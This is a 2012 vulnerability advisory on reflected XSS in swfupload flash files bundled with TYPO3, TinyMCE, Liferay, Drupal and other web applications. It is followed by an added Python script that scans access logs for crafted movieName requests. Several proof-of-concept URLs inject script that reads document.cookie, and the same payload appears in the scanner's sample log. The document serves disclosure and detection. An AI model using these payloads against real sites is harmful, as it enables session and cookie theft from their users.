SWF Upload f10 / f11 Cross Site Scripting

2012-11-25T00:00:00
ID PACKETSTORM:118343
Type packetstorm
Reporter MustLive
Modified 2012-11-25T00:00:00

Description

                                        
Hello list!
  
I want to draw your attention to an XSS vulnerability in other web applications
with swfupload. This is the final advisory concerning different versions of
this flash application. Earlier I wrote about swfupload in Archiv plugin
for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS,
AionWeb, Liferay Portal, SurgeMail, symfony and that this hole is available
in many other web applications.
  
In previous letters I wrote about web applications with
swfupload_f8.swf, swfupload_f9.swf and swfupload.swf (which are for Flash
Player 8, 9 and 10). Now I'll write about web applications with
swfupload_f10.swf and swfupload_f11.swf (which are for Flash Player 10 and
11). Here is information about SwfUploadPanel for TYPO3 CMS, Archiv plugin
for TinyMCE, Liferay Portal (Community Edition, which was earlier called
Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload
for Codeigniter and SentinelleOnAir, which are among the multiple web
applications bundled with swfupload_f10.swf or swfupload_f11.swf.
  
-------------------------  
Affected products:  
-------------------------  
  
Potentially all versions of SwfUploadPanel for TYPO3 CMS, Archiv plugin for
TinyMCE, Liferay Portal (Community Edition, which was earlier called
Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload
for Codeigniter and SentinelleOnAir are vulnerable. There is no information
that the developers have fixed this vulnerability in their software (whereas
this vulnerability was fixed in WordPress 3.3.2 on 20.04.2012).
  
The developers of WordPress released a new version of the flash file (as did
the developers of XenForo), which can be used by all web developers who
were using swfupload.
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
SwfUploadPanel for TYPO3 CMS:  
  
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Archiv plugin for TinyMCE:  
  
http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Archiv plugin for TinyMCE also contains swfupload_f10.swf, besides the
earlier described swfupload_f9.swf and swfupload_f8.swf.
  
Liferay Portal:  
  
http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Liferay Portal also contains swfupload_f10.swf, besides the earlier described
swfupload_f9.swf and swfupload_f8.swf.
  
Swfupload for Drupal:  
  
As can be seen from the project
http://code.google.com/p/drupal-swfupload/, there is a version of Swfupload
for Drupal. But this project itself contains no files. They are in
the project Respectiva (http://code.google.com/p/respectiva/), which is
Drupal with Swfupload.
  
http://site/js/libs/swfupload_f10.swf  
  
SWFUpload for Codeigniter:  
  
http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
This concerns swfupload_f10.swf. As for swfupload_f11.swf,
in Google's index there is only one project, SentinelleOnAir, which
contains swfupload_f11.swf.
  
SentinelleOnAir:  
  
http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
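For defenders triaging this issue, the following is an added example (not part of the original advisory) that scans web access logs for requests to any swfupload*.swf file whose movieName parameter is not a plain identifier. The log format (Common/Combined Log Format), the allowlist of characters and the function names are assumptions of this example; the sample log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Request line inside a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# File names like those in the advisory: swfupload.swf, swfupload_f10.swf, swfupload11.swf.
SWF_RE = re.compile(r'(?:^|/)swfupload[\w.-]*\.swf$', re.IGNORECASE)
# Assumption of this example: a legitimate movieName is a plain identifier.
SAFE_MOVIENAME_RE = re.compile(r'[A-Za-z0-9_.-]*')


def movie_names(query):
    """Yield every decoded movieName value found in a raw query string."""
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        if unquote_plus(name).lower() == 'moviename':
            yield unquote_plus(value)


def flag_swfupload_requests(log_lines):
    """Return (client, path, movieName) for each suspicious swfupload request."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a parseable access-log entry
        path, _, query = match.group('target').partition('?')
        if not SWF_RE.search(unquote_plus(path)):
            continue  # request is not for a swfupload flash file
        for value in movie_names(query):
            if not SAFE_MOVIENAME_RE.fullmatch(value):
                findings.append((match.group('client'), path, value))
    return findings


# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Nov/2012:10:00:01 +0000] "GET /html/js/misc/swfupload/swfupload_f10.swf?movieName=SWFUpload_0 HTTP/1.1" 200 12345',
    '192.0.2.44 - - [25/Nov/2012:10:00:07 +0000] "GET /www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// HTTP/1.1" 200 12345',
    '192.0.2.10 - - [25/Nov/2012:10:00:09 +0000] "GET /index.php?movieName=%22x HTTP/1.1" 200 512',
    '192.0.2.77 - - [25/Nov/2012:10:01:30 +0000] "GET /upload/swfupload/swfupload11.swf?x=1&movieName=a%3Cb HTTP/1.1" 200 12345',
]

if __name__ == '__main__':
    for client, path, value in flag_swfupload_requests(SAMPLE_LOG):
        print(client, path, repr(value))
```

A hit only shows that a crafted link was requested; whether the bundled flash file is still the unfixed build has to be checked on the server itself.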